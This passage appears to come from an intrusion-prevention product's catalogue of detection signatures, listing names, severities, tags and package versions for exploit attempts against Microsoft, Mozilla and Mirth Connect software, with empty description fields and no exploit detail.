About this situation: An attempt to exploit a vulnerability in Microsoft PowerShell detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-12, CVE2022, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1550-5242
Last changed: sgpkg-ips-1551-5242
Vulnerability: Microsoft-PowerShell-Remoting-Tabexpansion-Sandbox-Bypass
Description:
Back to top

File-TextId_Microsoft-SharePoint-Remote-Code-Execution-CVE-2020-17061

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint Server
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2020-11, CVE2020, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1295-5242
Vulnerability: Microsoft-SharePoint-Remote-Code-Execution-CVE-2020-17061
Description:
Back to top

File-TextId_Microsoft-Sharepoint-Remote-Code-Execution-Vulnerability-CVE-2023-33157

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Sharepoint, MS2023-07, CVE2023, Any Operating System not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1609-5242
Last changed: sgpkg-ips-1609-5242
Vulnerability: Microsoft-Sharepoint-Remote-Code-Execution-Vulnerability-CVE-2023-33157
Description:
Back to top

File-TextId_Microsoft-SharePoint-Server-RCE-CVE-2021-1707

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint Server
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2021-01, CVE2021, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1312-5242
Last changed: sgpkg-ips-1312-5242
Vulnerability: Microsoft-SharePoint-Server-RCE-CVE-2021-1707
Description:
Back to top

File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, CVE2021, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1835-5242
Last changed: sgpkg-ips-1835-5242
Vulnerability: Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420
Description:
Back to top

File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2025-02, CVE2025, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1835-5242
Last changed: sgpkg-ips-1864-5242
Vulnerability: Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400
Description:
Back to top

File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2025-04, CVE2025, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Vulnerability: Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794
Description:
Back to top

File-TextId_Microsoft-SharePoint-XML-External-Entity-CVE-2021-24072

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint Server
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2021-02, CVE2021, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1319-5242
Last changed: sgpkg-ips-1319-5242
Vulnerability: Microsoft-SharePoint-XML-External-Entity-CVE-2021-24072
Description:
Back to top

File-TextId_Microsoft-Sharepoint-Xml-Handling-Remote-File-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Groove Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server, Microsoft Sharepoint, MS2011-09, CVE2011, Windows not specific, Microsoft Office SharePoint Server not specific, Microsoft Sharepoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1503-5242
Vulnerability: Microsoft-Sharepoint-Xml-Handling-Remote-File-Disclosure
Description:
Back to top

File-TextId_Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link

About this situation: Malicious Microsoft Step-by-Step Interactive Training bookmark link was detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Step-by-Step Interactive Training, MS2007-02, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link-File-BOF
Description:
Back to top

File-TextId_Microsoft-Visio-DXF-File-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Visio detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio, Microsoft Office, Microsoft Office System, MS2008-04, CVE2008, Windows not specific, Microsoft Visio not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Visio-DXF-File-Handling-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Visio detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio, CVE2010, Windows not specific, Microsoft Visio not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow
Description:
Back to top

File-TextId_Microsoft-Visio-External-Entities-Resolution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Visio detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio 2003, Microsoft Visio 2007, Microsoft Visio 2010, MS2013-05, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-523-5211
Vulnerability: Microsoft-Visio-External-Entities-Resolution-Vulnerability
Description:
Back to top

File-TextId_Microsoft-Visio-External-Entities-Resolution-Vulnerability-2

About this situation: An attempt to exploit a vulnerability in Microsoft Visio detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio 2003, Microsoft Visio 2007, Microsoft Visio 2010, MS2013-05, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1188-5242
Vulnerability: Microsoft-Visio-External-Entities-Resolution-Vulnerability
Description:
Back to top

File-TextId_Microsoft-Visual-Basic-6.0-Vbp-Project-File-Handling-BOF

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Visual Basic, CVE2007, Windows not specific, Microsoft Visual Studio not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-559-5211
Vulnerability: HTTP_Microsoft-Visual-Basic-6.0-Project-File-Handling-BOF
Description:
Back to top

File-TextId_Microsoft-Visual-Basic-Vb6stkiy.dll-ActiveX-Control-BOF

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Visual Basic, CVE2008, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Visual-Basic-Enterprise-Vb6stkit.dll-Buffer-Overflow
Description:
Back to top

File-TextId_Microsoft-Visual-Studio-Project-Name-BOF

About this situation: An attempt to exploit a vulnerability in Visual Studio
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, CVE2006, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Visual-Studio-Project-Name-BOF
Description:
Back to top

File-TextId_Microsoft-Windows-Address-Book-Contact-File-Parsing-CVE-2020-1410

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1264-5242
Last changed: sgpkg-ips-1265-5242
Vulnerability: Microsoft-Windows-Address-Book-Contact-File-Parsing-CVE-2020-1410
Description:
Back to top

File-TextId_Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0092-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-03, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-635-5211
Vulnerability: Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0092-Memory-Corruption
Description:
Back to top

File-TextId_Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-10, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow
Description:
Back to top

File-TextId_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows 8.1, Windows 2012 R2, Any Hardware, MS2015-12, CVE2015, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Vulnerability: Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
Description:
Back to top

File-TextId_Microsoft-Windows-Contacts-Fnsummaryproc-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1568-5242
Last changed: sgpkg-ips-1581-5242
Vulnerability: Microsoft-Windows-Contacts-Fnsummaryproc-Remote-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Windows-Els.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows 7, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Any Hardware, MS2015-12, CVE2015, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Microsoft-Windows-Els.dll-Insecure-Library-Loading
Description:
Back to top

File-TextId_Microsoft-Windows-Event-Viewer-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1176-5242
Vulnerability: Microsoft-Windows-Event-Viewer-Information-Disclosure
Description:
Back to top

File-TextId_Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow

About this situation: Detects malicious URL files containing a crafted URL value
Context: Identified Text File Stream
Severity: 2
Tags: Windows, x86, CVE2006, Windows not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-501-5211
Vulnerability: Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
Description:
Back to top

File-TextId_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-11, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Vulnerability: Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025
Description:
Back to top

File-TextId_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-02, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Vulnerability: Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412
Description:
Back to top

File-TextId_Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow

About this situation: Detects exploit attempts to playlist handling of Microsoft Windows Media Player.
Context: Identified Text File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, Windows Media Player, MS2006-12, CVE2006, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-581-5211
Vulnerability: HTTP-Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow
Description:
Back to top

File-TextId_Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606
Description:
Back to top

File-TextId_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-12, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1757-5242
Vulnerability: Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
Description:
Back to top

File-TextId_Microsoft-Windows-Msvcrt.dll-Buffer-Overflow-CVE-2012-0150

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Identified Text File Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2012-02, CVE2012, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Windows-Msvcrt.dll-Buffer-Overflow-CVE-2012-0150
Description:
Back to top

File-TextId_Microsoft-Windows-NTLM-Relay-CVE-2025-24054

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2025, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1862-5242
Last changed: sgpkg-ips-1862-5242
Vulnerability: Microsoft-Windows-NTLM-Relay-CVE-2025-24054
Description:
Back to top

File-TextId_Microsoft-Windows-Object-Packager-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-10, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: Microsoft-Windows-Object-Packager-Remote-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-04, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Windows-Remote-Assistance-Xxe-Injection-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1052-5242
Last changed: sgpkg-ips-1710-5242
Vulnerability: Microsoft-Windows-Remote-Assistance-Xxe-Injection-Information-Disclosure
Description:
Back to top

File-TextId_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018

About this situation: An attempt exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-01, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-722-5211
Last changed: sgpkg-ips-734-5211
Vulnerability: Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
Description:
Back to top

File-TextId_Microsoft-Windows-Shell-File-Name-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-07, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Windows-Shell-File-Name-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-08, CVE2022, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1491-5242
Last changed: sgpkg-ips-1496-5242
Vulnerability: Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713
Description:
Back to top

File-TextId_Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution-1

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1235-5242
Last changed: sgpkg-ips-1235-5242
Vulnerability: Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1235-5242
Last changed: sgpkg-ips-1235-5242
Vulnerability: Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Windows-Vista-Contacts-Gadget-Code-Execution

About this situation: An attempt to exploit a vulnerability in Windows Vista detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows Vista, Any Hardware, MS2007-08, CVE2007, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-581-5211
Vulnerability: Microsoft-Windows-Vista-Contacts-Gadget-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Windows-Vista-Feed-Headlines-Gadget-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows Vista, Any Hardware, MS2007-08, CVE2007, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-1771-5242
Vulnerability: Microsoft-Windows-Vista-Feed-Headlines-Gadget-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow

About this situation: Detects long WebDAV resource names from server responses
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows WebDAV Mini-Redirector, MS2008-02, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-626-5211
Vulnerability: Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow
Description:
Back to top

File-TextId_Microsoft-Windows-WebDav-Mini-Redirector-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Any Hardware, MS2008-02, CVE2008, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-604-5211
Vulnerability: Microsoft-Windows-WebDav-Mini-Redirector-Heap-Buffer-Overflow
Description:
Back to top

File-TextId_Microsoft-Word-2003-XML-Document

About this situation: Microsoft Word 2003 XML download detected
Context: Identified Text File Stream
Severity: 2
Tags: Windows, Mac OS X, Any Hardware, Microsoft Word 2003, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-TextId_Microsoft-Word-2010-Document

About this situation: Microsoft Word 2013 document download detected
Context: Identified Text File Stream
Severity: 2
Tags: Windows, Mac OS X, Any Hardware, Microsoft Word 2010, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-TextId_Microsoft-Word-2013-Document

About this situation: Microsoft Word 2013 document download detected
Context: Identified Text File Stream
Severity: 2
Tags: Windows, Mac OS X, Any Hardware, Microsoft Word 2013, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-TextId_Microsoft-Word-Use-After-Free-CVE-2011-1983

About this situation: Detected attempt to exploit a vulnerability in Microsoft Word
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2011, MS2011-12, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Word-Use-After-Free-CVE-2011-1983
Description:
Back to top

File-TextId_Microsoft-XML-Core-Services-Content-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-11, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Microsoft-XML-Core-Services-Content-Parsing-Memory-Corruption
Description:
Back to top

File-TextId_Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280

About this situation: Detected attempt to exploit a vulnerability in Microsoft XML Editor
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server 2005, Microsoft InfoPath 2007, Microsoft SQL Server 2008, Microsoft Visual Studio 2008, MS2011-06, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280
Description:
Back to top

File-TextId_Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28482

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-28482
Description:
Back to top

File-TextId_Microsoft_Exchange_Suspicious-Request_CVE-2021-28482

About this situation: A suspicious request to a vulnerable component in Microsoft Exchange detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Vulnerability: Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-28482
Description:
Back to top

File-TextId_Microsoft_Sharepoint_Deserialization_Vulnerability_CVE-2022-38053

About this situation: An attempt to exploit a deserialization vulnerability in Microsoft Sharepoint detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2022-10, CVE2022, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1512-5242
Last changed: sgpkg-ips-1513-5242
Vulnerability: Microsoft_Sharepoint_Deserialization_Vulnerability_CVE-2022-38053
Description:
Back to top

File-TextId_Mirth-Connect-Remote-Code-Execution-CVE-2023-43208

About this situation: An attempt to exploit a vulnerability in Mirth Connect detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mirth Connect, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Vulnerability: Mirth-Connect-Remote-Code-Execution-CVE-2023-43208
Description:
Back to top

File-TextId_MONSOON-CnC-Traffic

About this situation: A suspicious traffic pattern detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-789-5211
Vulnerability: MONSOON-Control-Traffic
Description:
Back to top

File-TextId_Mozilla-Firefox-Domsvglength-Reflected-Attribute-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2014, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Domsvglength-Reflected-Attribute-Use-After-Free
Description:
Back to top

File-TextId_Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Mozilla Firefox products detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2007, Any Operating System not specific, Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption
Description:
Back to top

File-TextId_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution

About this situation: Command execution exploit against Mozilla Firefox detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Netscape, Mozilla Firefox, Adobe Reader, Adobe Acrobat, MS2007-11, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-1792-5242
Vulnerability: Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
Microsoft-Windows-ShellExecute-And-IE7-Url-Handling-Code-Execution
Description:
Back to top

File-TextId_Mozilla-Firefox-nsTreeRange-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Vulnerability: Mozilla-Firefox-nsTreeRange-Use-After-Free
Description:
Back to top

File-TextId_Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Identified Text File Stream
